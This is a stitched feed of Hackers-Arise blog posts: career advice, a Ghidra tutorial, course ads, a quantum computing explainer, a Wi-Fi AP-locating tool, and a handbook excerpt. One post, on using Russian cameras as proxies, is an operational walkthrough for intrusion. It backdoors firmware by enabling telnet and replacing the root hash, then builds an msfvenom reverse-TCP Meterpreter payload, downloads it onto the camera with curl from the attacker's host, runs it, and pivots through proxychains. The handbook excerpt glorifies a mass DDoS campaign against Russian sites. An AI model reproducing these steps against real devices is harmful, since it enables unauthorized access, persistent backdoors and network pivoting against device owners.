So many of you have written me about the difficulties of finding an entry-level job in cybersecurity that I thought I should offer you some of my insights. At this moment in history, artificial intelligence (AI) is making it particularly difficult to find that entry-level job as companies are using AI to fulfill these tasks.

Here are my thoughts on the best approach to landing that first job in cybersecurity!

The best way to get a starting level job in cybersecurity is to combine industry certifications, hands-on skills development, networking, and relevant IT experience or education.

Step #1. Build Foundations and Skills

  • Study the basics: Networking, operating systems (especially Linux), system administration, scripting (e.g., Python), and security fundamentals. You can gain this background from my books Linux Basics for Hackers, Network Basics for Hackers and my upcoming Python Basics for Hackers.
  • Use free online resources, cybersecurity blogs (such as Hackers-Arise.com), YouTube (David Bombal, Yaniv Hoffman, Network Chuck), for practical, hands-on labs.
  • Learn basic programming—while not always required, scripting helps with automation and troubleshooting.

Step #2. Get Industry-Recognized Certifications

  • Start with CompTIA Security+ — the most respected entry-level cert; many entry-level jobs list it as a requirement.
  • Consider Network+ for networking fundamentals, or more specialized options like SSCP, GCIH.
  • Certifications signal employers you know security basics and are serious about the field.

Step #3. Pursue Hands-On Experience

  • Apply for IT/help desk, junior admin, or tech support roles—these are common stepping stones into security.
  • Take on internships, volunteer for IT/security projects, or contribute to open-source security initiatives. There are multiple open-source projects where you can gain hands-on experience without going through the hiring process. This indicates a strong commitment to cybersecurity and can help get past the “no experience” threshold. Hackers-Arise always has multiple open-source projects in our Discord server.
  • Build a personal “home lab” environment to practice tools and attacks in a legal, safe manner. You can accomplish this inexpensively and without needing an Internet connection using VMware or VirtualBox.

Step #4. Network and Get Involved

  • Attend local security meetups, online communities (Reddit, LinkedIn, Twitter), and conferences to build professional connections. This can also include the Hackers-Arise Discord server and community.
  • Connect with cybersecurity practitioners for insight, mentorship, and potential referrals.

Step #5. Tailor Your Resume and Apply Broadly

  • Document hands-on skills, home lab work, certifications, and transferable skills from any IT roles.
  • Customize your resume for each job and be ready to explain your skills and learning journey in interviews.
  • Explore entry-level roles such as SOC analyst, junior pentester, security technician, and IT support with a security focus.

Summary

  • Certifications + hands-on learning = fastest path to entry-level roles.
  • Network and build connections in the security community—it’s often who you know that helps get a foot in the door.
  • Apply even if you don’t meet every listed requirement: employers want passion, constant learning, and initiative in entry-level candidates.

This blended approach maximizes your chances of breaking into cybersecurity quickly, even without prior professional experience.

The post How to Find an Entry-Level Job in Cybersecurity first appeared on Hackers Arise.

Reverse Engineering Malware: Getting Started with Ghidra, Part 01

By: OTW
22 September 2025 at 11:19

Welcome back, my aspiring cyber warriors!

There are a number of excellent tools available to use in the field of reverse engineering (see Reverse Engineering, Part 3: Getting Started with IDA Pro and Part 5: Getting Started with OllyDbg), but now we have an excellent new option known as Ghidra. Ghidra was developed by the US National Security Agency (the US’s leading domestic spy agency and the agency responsible for developing Stuxnet malware and EternalBlue), one of the top espionage agencies in the world.

We first learned of Ghidra in the Wikileaks Vault 7 leak of 2017 and it was released as free and open-source (under the Apache License) software in spring 2019. It is an excellent reverse engineering tool and unlike IDA Pro, it’s free!

Ghidra has nearly all the functionality of IDA Pro without the cost, so if you are starting out in reverse engineering this is probably the software to use.

Due to its effectiveness and attractive price point, I will be using Ghidra to do a series of tutorials in Reverse Engineering Malware here at Hackers-Arise.

I strongly recommend that you read the following tutorials before proceeding here to work with Ghidra:

  1. Reverse Engineering Malware, Part 1: Getting Started

  2. Reverse Engineering Malware, Part 2: Assembler Basics

  3. Reverse Engineering Malware, Part 4: Windows Internals

Step #1: Download Ghidra

You can download Ghidra here. Since it is written in Java, it is available for nearly every platform including Windows, Mac OS and Linux. I’ll be using Windows 10 to demonstrate Ghidra.

Ghidra is a Java application and requires JDK 11. Make certain that your JDK is up to date and, if not, download it from Oracle.

Step #2: Start Ghidra

Once you have downloaded Ghidra, you can start it by clicking on the .bat file (kind of old school).

Ghidra opens up by displaying this logo for a brief time…

…and then displays this window to start your first project. Projects are similar to folders and can contain multiple files that you are working on.

Click “New Project”.

This opens a window like that below. One of the features of Ghidra is the ability to collaborate on a file or project. In that case, click “Shared Project”. Here we will be working individually on a project, so click “Non-Shared Project”. Then click Next.

Then, you will be asked for the location and name of your project. In Windows, by default, the project will be placed in your C:\Users\<Name>\ghidra directory. I will use that. Then enter your project name. Here I will call my project “MyFirstGhidraProject”.

Next, we need to import a file. This is the software or malware you want to analyze. Go to File -> Import File.

Select the file you want to analyze. In this case, I will be analyzing crackme0x00.exe (these simple crackme’s are available at https://github.com/Maijin/radare2-workshop-2015/tree/master/IOLI-crackme).

When you select your file, Ghidra will respond with the information below. Click OK.

Ghidra then displays a screen like below with the key information about the file.

Next, this screen pops up with your project and imported file. You can either double-click on the file or “drag and drop” the file to the green Ghidra dragon above it.

Ghidra then begins its work. First, it displays the assembler language of the program in the center Listing window and then asks whether you want to analyze the file. Click “Yes”.

Ghidra will now analyze your file and display the information similar to the four windows below.

These four windows are:

Window #1 is the Symbol Tree

This window allows you to see the Imports, Exports, Functions, Labels, Classes and Namespaces of the binary.

Window #2 is the Listing Window

This window displays the breakdown of the code in assembler language.

Window #3 is the Decompiler Window

The Decompiler enables you to see what the high-level language would likely look like.

Window #4 is the Data Type Manager Window

The Data Type manager allows you to see all the defined data types.

Now, you are ready to begin analyzing and reverse engineering this file!

Summary

Reverse engineering malware is one of the highest level skill sets within the discipline of cybersecurity and one of the highest paid. Ghidra is an excellent reverse engineering tool capable of running on nearly any platform and priced very attractively (free). In this series on Reverse Engineering, we will be using this tool from the US NSA to reverse engineer multiple pieces of malware beginning with the simple and progressing to the more advanced.

The post Reverse Engineering Malware: Getting Started with Ghidra, Part 01 first appeared on Hackers Arise.

Intermediate Cryptography Training, November 4-6

By: OTW
31 October 2025 at 15:38

Cryptography is a fundamental skill to cybersecurity!

Cryptography is what keeps our systems and data secure. Without it, all of our information is at risk.

This class is designed to give you a strong background in cryptography, further enhancing your knowledge and skill in this key field and making you even more valuable in the cybersecurity marketplace.

With quantum computing and quantum cryptography emerging on the near-term horizon, a strong background in cryptography will help your organization prepare and keep your data secure.

If you are a cybersecurity professional or manager, you will want to attend this training!


1. Foundations & Mathematical Background

  • Probabilistic and computational security
  • Number theory basics (modular arithmetic, cyclic groups)
  • One-way and trapdoor functions

2. Symmetric-Key Cryptography

  • Stream ciphers (One-time pad, RC4)
  • Block ciphers (DES, AES, Feistel networks)
  • Block cipher modes (CBC, ECB, CTR, OFB)
  • Attacks: brute-force, linear, differential cryptanalysis

3. Message Authentication & Integrity

  • Message Authentication Codes (HMAC, CBC-MAC, PMAC)
  • Collision-resistant Hash Functions (SHA family, Merkle-Damgård)
  • Authenticated encryption modes (GCM, CCM)

4. Public-Key Cryptography

  • Arithmetic in finite groups, cyclic groups
  • Diffie-Hellman key exchange, CDH/Discrete-log assumptions
  • RSA and El-Gamal encryption systems
  • Security notions: semantic security, CCA security

5. Digital Signatures

  • RSA signatures, applications
  • Hash-based and elliptic curve signature schemes (ECDSA, etc.)
  • Certificates and PKI infrastructure

6. Advanced Protocols

  • Password protocols, challenge-response, salts
  • Secure key exchange protocols (TLS, SSL, authenticated key exchange)
  • Zero-knowledge proofs and commitment schemes

7. Modern & Emerging Topics

  • Post-quantum cryptography (lattice-based, hash-based schemes)
  • Quantum attacks on classical systems
  • Homomorphic encryption and applications

8. Practical Applications

  • Cryptographic implementation pitfalls (side-channel attacks, real-world failures)
  • Case studies: Secure messaging, disk encryption, cryptocurrencies
  • Secure software engineering: protocol design, trusted setup, code audits

9. Attacks and Defenses

  • Cryptanalysis case studies
  • Implementation vulnerabilities (padding oracle, timing attacks, etc.)
  • Attacks against protocols and key management

To enroll in this course, you can become a Subscriber Pro or purchase this single course.


The post Intermediate Cryptography Training, November 4-6 first appeared on Hackers Arise.

Network Espionage – Using Russian Cameras as Proxy, Part 3

By: OTW
16 September 2025 at 10:25

Welcome back, cyberwarriors.

Hope you’re enjoying the series so far. Today we are wrapping it up with the final part, focused on modifying camera firmware. This is the most advanced and risky method. It takes time and precision. The biggest challenge is finding firmware that’s suitable for editing and compiling back without breaking the device. Every manufacturer uses specific formats, so if you mess up the structure or file system, the camera won’t boot again. Always proceed carefully.

Case 4: Modifications

This case is similar to the previous one, but we are going deeper. Imagine the camera you found does not have any ports open, like SSH or Telnet – and neither is configurable in the settings. At first glance, it looks like a dead end.

Translation: Обновление прошивки — Firmware update
Browse… No file selected. OK

But then you discover it allows firmware updates. Most cameras have this feature available from the web dashboard. That’s your way in. The first step is to get a copy of the firmware. You can find it on third-party firmware archives or from the official manufacturer’s website.

After downloading the firmware, extract it. We found a script file named run.sh inside. When we opened it, we noticed something interesting.

The script had a Telnet launch command that was commented out. We removed the comment to enable Telnet.

That solves one part. But we don’t know the Telnet password that is hashed in the passwd file. By default you can find this file in the /etc directory:

Instead of cracking the existing password hash, we generate our own:

kali > openssl passwd -1 password

This gives a new hash string. Replace the existing hash in the /etc/passwd file with the one you just generated. Save the changes.

Now you need to repack the entire directory structure into a new firmware file. Create a new directory and move everything into it:

kali > mkdir firmware

kali > mv etc firmware/

And so on, until you move all other directories.

Recompiling

Our firmware was using the cramfs (Compressed ROM File System). You’ll need to install cramfs tools directly from the Ubuntu repo, as it is not available for Kali.

Here is the link where you can find it:

http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/

Let’s download it:

kali > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb

kali > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb

Once installed, create the new firmware image:

kali > mkcramfs firmware firmware-x.cramfs

Rename the file to match the original firmware name to avoid upload issues. We named it firmware to clear the view and make it easier to understand. Go back to the camera dashboard and upload the modified firmware.

Translation: Обновление прошивки — Firmware update
Browse… firmware-x.cramfs OK

Wait a few minutes for it to flash and reboot. To check if it’s back online:

kali > ping <camera_ip>

Once the camera responds, connect via Telnet:

kali > telnet <camera_ip> 23

Log in using root and the password you created. If successful, you’ll be inside the system. In our case, the target already had nc installed, which helped a lot.

Payload Execution

Determine the architecture of the system:

target > uname -m

Create the payload on Kali:

kali > msfvenom -p linux/<arch>/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf

Host the payload on your Kali machine:

kali > python3 -m http.server

Then download it to the target:

target > curl -O http://<kali_ip>:8000/shell.elf

target > chmod +x shell.elf

target > ./shell.elf

Open Metasploit on Kali, set up multi/handler with the same payload options, and you’ll get a Meterpreter session. From there, use proxychains with a SOCKS proxy to route your traffic through the compromised camera and access the network behind it. All of these steps were covered in the previous parts.

Conclusion

Modifying camera firmware is the most advanced step in gaining persistent access. It allows you to create a custom backdoor even when all ports are closed. The method gives full control, but it also comes with the highest risk. A small mistake and the camera is dead. But if done right, it’s a powerful tool for deeper infiltration. With this final part, you now have a complete playbook for hacking, accessing, and using Russian cameras as proxies in espionage operations. Good luck on your next hunt.

The post Network Espionage – Using Russian Cameras as Proxy, Part 3 first appeared on Hackers Arise.

What is Quantum Computing How Does It Threaten Cybersecurity?

By: OTW
12 September 2025 at 12:32

Welcome back, my aspiring cyberwarriors!

For decades now, people have been talking with bated breath about quantum computing and its potential to revolutionize computing. So far, no commercial products have appeared. This isn’t dissimilar (I know, a double negative) from what happened to artificial intelligence. For decades, people talked about the promise of AI, and then suddenly, it was upon us and everywhere.

Quantum computing isn’t upon us yet, but it is very close. Maybe 3 years away from hybrid CPU/GPU/QBit machines. That’s not long to prepare for the revolution it will unleash on cybersecurity.

In this post, I want to help you to better understand what quantum computing is and how it will change the discipline we love, cybersecurity. If any of this interests you, we have an Intermediate Cryptography training coming up, October 21-23. We will delve deeper into quantum computing and post-quantum cryptography (PQC) in that class.

This is a revolution you don’t want to miss!

What is Quantum Computing?

Quantum computing is an advanced field of computer science that uses the principles of quantum mechanics—such as superposition, entanglement, and interference—to process information in ways that are fundamentally different from classical computers.

What is Quantum Mechanics?

Quantum mechanics is the fundamental branch of physics that describes how matter and energy behave at very small scales—typically atoms and subatomic particles. It explains phenomena that classical physics cannot explain, introducing principles like wave-particle duality, superposition, and the uncertainty principle.

Core Principles of Quantum Mechanics

Wave-particle duality: Quantum entities like electrons and photons show both particle and wave characteristics, depending on how they are measured.

Superposition: A quantum system can exist in multiple states simultaneously until measured, at which point it collapses to a definite state.

Uncertainty principle: It is impossible to precisely know both the position and momentum of a particle at the same time (Heisenberg’s Uncertainty Principle).

Quantization: Physical properties such as energy, momentum, and angular momentum can only take discrete values in quantum systems.

Probability and measurement: Quantum mechanics provides probabilities of outcomes, not certainties—only accounting for what is likely to be measured. This is a fundamental difference between quantum mechanics and traditional mechanics and a major challenge of bringing quantum computing to the commercial and practical use.

Key Concepts of Quantum Computing

Qubit: The quantum analogue of the classical bit. Unlike a classical bit, which is always deterministic (either 0 or 1) a qubit can exist in a superposition of both states simultaneously, which allows quantum computers to process many possibilities at once.

Superposition: A principle where a qubit can be both 0 and 1 at the same time. This enables quantum computers to handle much larger computational spaces than classical bits.

Entanglement: A phenomenon where qubits become linked such that the state of one instantly influences the state of another, no matter how far apart they are. This property boosts quantum processing power for certain calculations.

Interference: Quantum algorithms are designed to amplify the probability of correct answers and reduce the probability of incorrect ones using interference patterns.

Why Is Quantum Computing Important?

Quantum computers have the potential to solve complex problems much faster than classical computers, such as factoring large numbers (important in cryptography), simulating molecules for drug discovery, and optimizing large datasets. It is the ability to quickly factor very large numbers that is of most interest to us in cybersecurity. Asymmetric encryption is dependent upon the inability of modern, traditional computers to solve these calculations quickly. Quantum computers do not lack this ability and asymmetric encryption algorithms such as RSA are easily broken by quantum computers using Shor’s algorithm.

Limitations and State of the Art

Most quantum computers today are experimental and best suited for specific research or narrow applications but practical applications are on the near horizon. Quantum computing companies such as IONQ have signed contracts with the US Defense Department and US Air Force to offer quantum computing services. This means that state-sponsored actors are likely to have quantum computing capabilities long before the rest of us.

Challenges include qubit stability (decoherence), error rates, and scaling up to large numbers of qubits for practical use. Despite these challenges, industry leaders such as Nvidia’s Jensen Huang are developing hybrid systems that will integrate CPUs, GPUs and qubits. These will likely be the first commercial systems and are probably only 3 years away.

Summary Table

Classical Computer | Quantum Computer
Bit (0 or 1) | Qubit (0, 1, both via superposition)
Deterministic | Probabilistic
Linear scaling | Exponential scaling with qubits
Limited by classical physics | Exploits quantum mechanics

Quantum computing represents a revolutionary approach for tasks that remain too hard for today’s most powerful classical systems including asymmetric cryptography (RSA, ECC).

How Quantum Computing Threatens Cybersecurity

Breaking Current Encryption: Quantum computers, thanks to algorithms like Shor’s, will be able to factor large numbers and solve mathematical problems that underpin widely used encryption methods such as RSA and ECC at unprecedented speeds. This means that secure communications (HTTPS, VPNs, digital signatures) and much of the world’s encrypted data could be decrypted by quantum adversaries, exposing sensitive information, financial transactions, private communications, and critical infrastructure.

‘Harvest Now, Decrypt Later’ Threat: Malicious actors may harvest encrypted data today, intending to decrypt it in the future when quantum computing power becomes available.

Vulnerable Infrastructure: Industries relying on legacy encryption—such as banking, healthcare, and government—are particularly threatened, as data breaches could result in massive regulatory, financial, and reputational harm.

Advanced Malware and Attacks: Quantum computing may also enable more advanced malware, AI-driven attacks, and the rapid discovery of vulnerabilities, further evading current detection systems.

Post Quantum Cryptography

Post-quantum cryptography (PQC) is the field focused on designing and standardizing cryptographic algorithms that are secure against attacks by both classical computers and future quantum computers. It aims to protect data and communications from being decrypted by powerful quantum machines that could break today’s widely used public-key cryptography, such as RSA and Elliptic Curve schemes.

Implementing post-quantum cryptography will mean replacing today’s hardware and software with new IT infrastructure. Those who fail to do this will no longer enjoy the benefits of confidentiality and privacy. Until this new infrastructure is deployed, the first movers with access to quantum systems will be able to break everyone’s cryptography.

Summary

Quantum computing will radically reshape the threat landscape—eroding the security of current systems. Once the state-sponsored entities from the US, Russia, China, and Israel have these systems at their disposal, none of our information will be safe. Remember that asymmetric encryption is usually used for key exchange between communicating systems. If the key exchange can be intercepted, nothing is safe!

The post What is Quantum Computing How Does It Threaten Cybersecurity? first appeared on Hackers Arise.

It’s Time to Elevate Your Cybersecurity Game! Earn the Crown Jewel of Cybersecurity Certifications!

By: OTW
11 September 2025 at 22:16

The CISSP is widely considered to be the premier cybersecurity certification. The average salary in the US is almost $150,000 and I’ll bet your boss has one.

If not, their boss is certified with the CISSP.

This is your ticket to a rewarding, high-paying career in cybersecurity.

A Four-Day boot camp, September 23-26

Now, you can go to the head of the class in cybersecurity with this 4-day intensive bootcamp with Master OTW. This class is available to everyone in the Subscriber package or you can buy the individual LIVE class for just $199.

Even if you won’t be taking the exam and earning the certification, this is an excellent class to learn in-depth cybersecurity techniques and technologies used by secure companies from around the world and will help you throughout your long and prosperous career in cybersecurity.

Take a look at what our students have said about our CISSP bootcamps.

To join this training, become a Subscriber at Hackers-Arise and get this and over 40 other courses.

If you just want the CISSP training, you can purchase the training separately here for just $199.

The post It’s Time to Elevate Your Cybersecurity Game! Earn the Crown Jewel of Cybersecurity Certifications! first appeared on Hackers Arise.

Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s

By: OTW
4 October 2025 at 11:46

Hackers Arise Wi-Fi Radar

Welcome back, aspiring cyberwarriors!

One of our advanced students who goes by the handle Mike211 has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is its ability to locate the Wi-Fi access points (AP) in your area.

I’ll let him introduce his new tool below!

In the Wi-Fi domain, raw signal strength and MAC identifiers can reveal more than just the presence of networks — they can open a path to estimating physical distance, mapping access points, and even executing wardriving missions or indoor localization without GPS. If you’ve ever wanted to push the boundaries of Wi-Fi auditing beyond mere detection, Hackers Arise Radar is your next-level tool.

Why this Tool is Game Changing

Just like Wigle.net collects crowdsourced location data of APs, this project allows you to discover and map Wi-Fi access points in real-time using only your Linux laptop or USB Wi-Fi adapter.

With this tool, you’ll get:

– Continuous scans over 2.4 GHz, 5 GHz, 6 GHz, or all bands
– Fully automated interface setup (monitor mode, regulatory domain, TX power)
– Filtered and smoothed RSSI values with Kalman filtering
– On-demand calibration for RSSI-to-distance
– Spring-model map generation to visualize spatial relationships
– Exportable logs, visuals, and calibration profiles for future use

Whether you’re driving through a city, walking indoors, or performing a pentest, you can leverage this tool for actionable location data.

How it Works – Step by Step

Step #1. Launch & Configuration


Start the script:


kali > sudo python3 Hackers_Arise_Radar.py

You’ll be greeted with a colorful terminal interface that guides you through:


– Selecting your Wi-Fi interface
– Choosing the operational environment (indoor, urban, open space)
– Selecting scan band (2.4 GHz / 5 GHz / 6 GHz / All)

No need to manually enable monitor mode – the script automatically puts your adapter into monitor mode, sets the regulatory domain, and adjusts TX power based on your choices.

Step #2. Real-Time Wi-Fi Scanning


The script uses airodump-ng behind the scenes to:
– Continuously scan surrounding Wi-Fi networks
– Record BSSID, SSID, RSSI, channel, frequency band
– Stream live updates through a structured CSV output for parsing and analysis

Step #3. RSSI Filtering & Analytics


To reduce RSSI noise, the script implements a Kalman filter. This Kalman filter:


– Smooths out transient signal spikes
– Creates a rolling average of RSSI per BSSID
– Improves distance estimation consistency

Step #4. Estimating Distance from RSSI


The tool calculates the distance using a log-distance path loss model such as:


d = 10^((TX_power - RSSI) / (10 * n))

Where:
– TX_power and path-loss exponent n are customizable or calculated through calibration
– RSSI is dynamically filtered
– Distance is measured in meters

Step #5. Calibration Engine


The included calibration module lets you:


– Input known RSSI and real-world distances
– Fit an optimized curve per BSSID
– Automatically store TX power, path-loss exponent, and R² fit for reuse
– Flag poorly calibrated networks with suggestions
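Steps 3 to 5 in one place, as an added example that is not the Hackers Arise Radar script's own code: a one-dimensional Kalman filter for RSSI, the log-distance formula from Step 4, and a least-squares calibration that recovers TX_power, the path-loss exponent n and R² from known distances. The class and function names, the filter variances and all sample readings are assumptions constructed for illustration.

```python
import math


def estimate_distance(rssi, tx_power, n):
    """Log-distance path loss model: d = 10^((TX_power - RSSI) / (10 * n)), in meters.

    In this model TX_power is the RSSI expected at 1 m from the access point.
    """
    return 10 ** ((tx_power - rssi) / (10.0 * n))


class RssiKalman:
    """Scalar Kalman filter for a slowly changing RSSI value (one per BSSID)."""

    def __init__(self, process_var=0.05, measurement_var=9.0):
        self.q = process_var        # how fast the true RSSI is allowed to drift
        self.r = measurement_var    # how noisy a single reading is (dB^2)
        self.x = None               # current estimate
        self.p = 1.0                # variance of the estimate

    def update(self, z):
        if self.x is None:          # first reading initializes the state
            self.x = float(z)
            return self.x
        self.p += self.q                    # predict: uncertainty grows
        k = self.p / (self.p + self.r)      # Kalman gain
        self.x += k * (z - self.x)          # correct toward the measurement
        self.p *= (1.0 - k)
        return self.x


def smooth(readings):
    """Filter a sequence of raw RSSI readings; returns the filtered sequence."""
    kf = RssiKalman()
    return [kf.update(z) for z in readings]


def calibrate(samples):
    """Fit RSSI = TX_power - 10*n*log10(d) to [(distance_m, rssi_dbm), ...].

    Returns (tx_power, n, r_squared) from an ordinary least-squares line fit.
    """
    if len(samples) < 2:
        raise ValueError("need at least two calibration points")
    xs = [math.log10(d) for d, _ in samples]
    ys = [float(rssi) for _, rssi in samples]
    mx, my = sum(xs) / len(xs), sum(ys) / len(ys)
    sxx = sum((x - mx) ** 2 for x in xs)
    if sxx == 0:
        raise ValueError("calibration points must use different distances")
    slope = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sxx
    intercept = my - slope * mx
    ss_res = sum((y - (intercept + slope * x)) ** 2 for x, y in zip(xs, ys))
    ss_tot = sum((y - my) ** 2 for y in ys)
    r2 = 1.0 - ss_res / ss_tot if ss_tot else 1.0
    return intercept, -slope / 10.0, r2


# Constructed calibration walk: (distance in meters, measured RSSI in dBm).
CALIBRATION_SAMPLES = [(1.0, -41.0), (2.0, -47.0), (4.0, -56.0), (8.0, -62.0), (16.0, -71.0)]
# Constructed live readings for one BSSID, including a single spike (-48).
RAW_RSSI = [-63, -61, -64, -48, -62, -63, -60, -62]


if __name__ == "__main__":
    tx_power, n, r2 = calibrate(CALIBRATION_SAMPLES)
    print(f"TX_power={tx_power:.1f} dBm  n={n:.2f}  R^2={r2:.3f}")
    for raw, filt in zip(RAW_RSSI, smooth(RAW_RSSI)):
        print(f"raw {raw:4d} dBm -> {estimate_distance(raw, tx_power, n):5.1f} m | "
              f"filtered {filt:6.1f} dBm -> {estimate_distance(filt, tx_power, n):5.1f} m")
```

The spike moves the raw estimate by several meters and the filtered one only slightly, and the same RSSI gives a very different distance if n is wrong, which is why per-environment calibration matters.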

Step #6. Visual Mapping – Spring Model Layout


Once enough data is gathered, the tool uses a spring-model algorithm to create a map:
– Nodes (BSSIDs) are arranged based on estimated distances
– Forces push/pull the layout into geometric balance
– Labels show SSIDs, bands, and estimated distance in meters

Step #7. Regulatory & Power Tuning Mode


The tool isn’t just a scanner — it includes a dedicated utility mode to:


– Set regulatory domain (iw reg set <country_code>)
– Modify TX power (in dBm)
– Retrieve and display current wireless driver info
– Perform diagnostics before scanning

Focus Mode: Tracking a Single Access Point

Sometimes you just need to follow one Wi-Fi target — whether it’s a rogue device, a signal beacon, or an access point you’re using for indoor positioning.

Hackers Arise Radar includes a specialized mode for scanning and tracking a single BSSID:


– Select a known access point from your previously scanned list
– The tool locks onto that specific MAC address using:
  airodump-ng --bssid <target> --channel <ch>
– RSSI values are filtered using a Kalman filter
– Distance estimation is updated in real-time using the calibration profile
– Live updates show proximity and confidence

Real World Use Cases

– Wardriving Missions: Continuous logs while driving
– Indoor Wireless Mapping: Signal-based AP triangulation, spatial layouts
– Security & Pentesting Recon: Detect new/rogue APs, estimate proximity
– Wi-Fi Optimization: Adjust regulatory domain / TX power, evaluate coverage
– Wireless Simulation & Testing: Simulate RSSI data with simulate_rss_matrix.py

Requirements & Setup

– Platform: Linux (Kali/Debian-based)
– Python: 3.7+
– Privileges: sudo required
– External Tools: aircrack-ng, iw, ip, ethtool
– Python Libraries: numpy, scipy, pandas, matplotlib, adjustText

Launch simply with:


kali> sudo python3 Hackers_Arise_Radar.py


No need to prep interfaces — the tool handles it all.

Summary

Hackers Arise Radar is more than just a scanner. It is a fully interactive system for Wi-Fi discovery, proximity estimation, map generation, and interface configuration — all controlled through an elegant terminal menu.

Built for hackers, engineers, educators, and hobbyists, this tool empowers you to:
– Visualize your wireless environment
– Optimize TX power and regulatory settings
– Log and export clean data
– Build wireless maps with zero GPS

Start scanning smarter — not harder.

For more information on this unique and powerful scanner, see our Wi-Fi Hacking training.

The post Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s first appeared on Hackers Arise.

The CyberWarrior Handbook, Part 01

By: OTW
11 November 2025 at 13:58

Welcome back, my cyberwarriors!

In this series, we will detail how an individual or small group of cyberwarriors can impact global geopolitics. The knowledge and tools that YOU hold are a superpower that can change history.

Use it wisely.

To begin this discussion, let’s look at the actions of a small group of hackers at the outset of the Russian invasion of Ukraine. We will detail these actions up to the present, attempting to demonstrate that even a single individual or small group can influence global outcomes in our connected digital world. Cyber war is real and even a single individual can have an impact on global political outcomes.

Let’s begin in February 2022, nearly 3 years ago. At that time, Ukraine was struggling to throw off the yoke of Russian domination. As a former member state of the Soviet Union (the successor to the Romanov’s Russian Empire), they declared their independence, like so many former Soviet republics (such as Estonia, Latvia, Lithuania, Georgia, Armenia, Kazakhstan, and others) from that failed and brutal alliance in 1991 (this is the moment that the Soviet Union disintegrated). This union failed primarily due to the inability of the Soviet Union to address the needs of their citizens. Simple things like food, clean water, and consumer goods. And, of course, the tyranny.

Russia, having lost absolute control of these nations, attempted to maintain influence and control by bending their leaders to Putin’s will. In Ukraine, this meant a string of leaders who answered to Putin, rather than the Ukrainian people. In addition, Russian state-sponsored hackers, such as Sandworm, attacked Ukraine’s digital infrastructure repeatedly to create chaos and confusion within the populace. This included the famous BlackEnergy3 attack in 2014 against the Ukrainian power transmission system that blacked out large segments of Ukraine in the depths of winter (for more on this and other Russian cyberattacks against Ukraine, read this article).

In February 2022, the US and Western intelligence agencies warned of an imminent attack from Russia on Ukraine. In an unprecedented move, the US president and the intelligence community revealed (based upon satellite and human intelligence) that Russia was about to invade Ukraine. The new Ukrainian president, Volodymyr Zelenskyy, publicly denied and tried to minimize the probability that an attack was about to take place. Zelenskyy had been a popular comedian and actor in Ukraine (there is a Netflix comedy made by Zelenskyy before he became president named “Servant of the People”) and was elected president in a landslide election as the people of Ukraine attempted to clean Russian domination from their politics and become part of the free Europe. Zelenskyy may have denied the likelihood of a Russian attack to bolster the public mood in Ukraine and not anger the Russian leader (Ukraine and Russia have long family ties on both sides of the border).

We at Hackers-Arise took these warnings to heart and started to prepare.

List of Targets in Russia

First, we enumerated the key websites and IP addresses of critical and essential Russian military and commercial interests. There was no time to do extensive vulnerability research on each of those sites with the attack imminent, so instead, we readied one of the largest DDoS attacks in history! The goal was to disable the Russians’ ability to use their websites and digital communications to further their war ends and cripple their economy. This is exactly the same tactic that Russia had used in previous cyber wars against their former republics, Georgia and Estonia. In fact, at the same time, Russian hackers had compromised the ViaSat satellite internet service and were about to send Ukraine and parts of Europe into Internet darkness (read about this attack here).

We put out the word to hackers around the world to prepare. Tens of thousands of hackers prepared to protect Ukraine’s sovereignty. Eventually, when Russian troops crossed the border into Ukraine on February 24, 2022, we were ready. At this point in time, Ukraine created the IT Army of Ukraine and requested assistance from hackers across the world, including Hackers-Arise.

Within minutes, we launched the largest DDoS attack the Russians had ever seen, over 760GB/sec (as documented later by the Russian telecom provider, Rostelecom). This was twice the size of any DDoS attack in Russian history (https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/). This attack was a coordinated DDoS attack against approximately 50 sites in Russia such as the Department of Defense, the Moscow Stock Exchange, Gazprom, and other key commercial and military interests.

As a result of this attack, Russian military and commercial interests were hamstrung. Websites were unreachable and communication was hampered. After the fact, Russian government leaders estimated that 17,000 IP addresses had participated and they vowed to exact revenge on all 17,000 of us (we estimated the actual number was closer to 100,000).

This massive DDoS attack, unlike any Russia had ever seen and totally unexpected by Russian leaders, hampered the coordination of military efforts and brought parts of the Russian economy to its knees. The Moscow Stock Exchange shut down and the largest bank, Sberbank, closed. This attack continued for about 6 weeks and effectively sent the message to the Russian leaders that the global hacker/cyberwarrior community opposed their aggression and was willing to do something about it. This was a first in the history of the world!

The attack was simple in the context of DDoS attacks. Most DDoS attacks in our modern era involve layer 7 resources to make sites unavailable, but this one was simply an attack to clog the pipelines in Russia with “garbage” traffic. It worked. It worked largely because Russia was arrogant and unprepared without adequate DDoS protection from the likes of Cloudflare or Radware.

Within days, we began a new campaign to target the Russian oligarchs, the greatest beneficiaries of Putin’s kleptocracy (you can read more about it here). These oligarchs are complicit in robbing the Russian people of their resources and income for their benefit. They are the linchpin that keeps the murderer, Putin, in power. In this campaign, initiated by Hackers-Arise, we sought to harass the oligarchs in their yachts throughout the world (the oligarchs escape Russia whenever they can). We sought to first (1) identify their yachts, then (2) locate their yachts, and finally (3) send concerned citizens to block their fueling and re-supply. In very short order, this campaign evolved into a program to capture these same super yachts and hold them until the war was over, eventually to sell and raise funds to rebuild Ukraine. We successfully identified, located, and seized the top 9 oligarch yachts (worth billions of USD), including Putin’s personal yacht (this was the most difficult). All of them were seized by NATO forces and are still being held.

In the next few posts here we will detail:

  1. The request from the Ukraine Army to hack IP cameras in Ukraine for surveillance and our success in doing so;

  2. The attacks against Russian industrial systems that resulted in damaging fires and other malfunctions.

    Look for Master OTW’s book, “A Cyberwarrior Handbook”, coming in 2026.

Can Hackers “See” Inside Your Home Using Wi-Fi to Track Your Location and Movement?

By: OTW
22 July 2025 at 12:11

Welcome back, my aspiring cyberwarriors!

The quick answer is “Yes!”.

